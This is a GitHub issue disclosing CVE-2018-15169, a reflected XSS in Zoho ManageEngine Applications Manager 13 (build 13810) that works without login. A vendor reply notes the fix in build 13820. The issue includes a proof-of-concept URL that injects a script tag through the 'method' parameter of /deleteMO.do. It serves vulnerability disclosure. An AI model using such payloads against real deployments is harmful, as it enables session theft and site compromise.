search

x-f1v3 / ForCve

0 stars 0 forks source link

[CVE-2018-15169]Zoho manageengine Applications Manager Reflected XSS #3

Open x-f1v3 opened 6 years ago

x-f1v3 commented 6 years ago

Zoho manageengine Applications Manager 13 (13810 build) Reflected XSS

Date: 2018/07/18 Software Link: https://www.manageengine.com/products/applications_manager/download.html Category: Web Application Exploit Author: jacky xing From DBAppSecurity Exploit Author's Email: jacky.xing@dbappsecurity.com.cn CVE:CVE-2018-15169

I found a Reflected XSS in the Zoho ManageEngine Applications Manager 13 (13810 build) via the method parameter in /deleteMO.do?listview=true&method=deleteMO&viewmontype= GET request.

Proof of Concept

/deleteMO.do?listview=true&method=deleteMO</textarea><script>alert(document.domain)</script>//&viewmontype=

Local test: image

Demo site test: image

Notice: This vul can reproduce without login.

The vendor has fixed the vulnerability: https://www.manageengine.com/products/applications_manager/issues.html

Priyankaroy93 commented 5 years ago

We apologise for the inconvenience this may have caused to our customers. These issues were fixed in July itself, with the release of version 13820. Please upgrade to the latest version from here: http://bit.ly/APMDownload

ManageEngine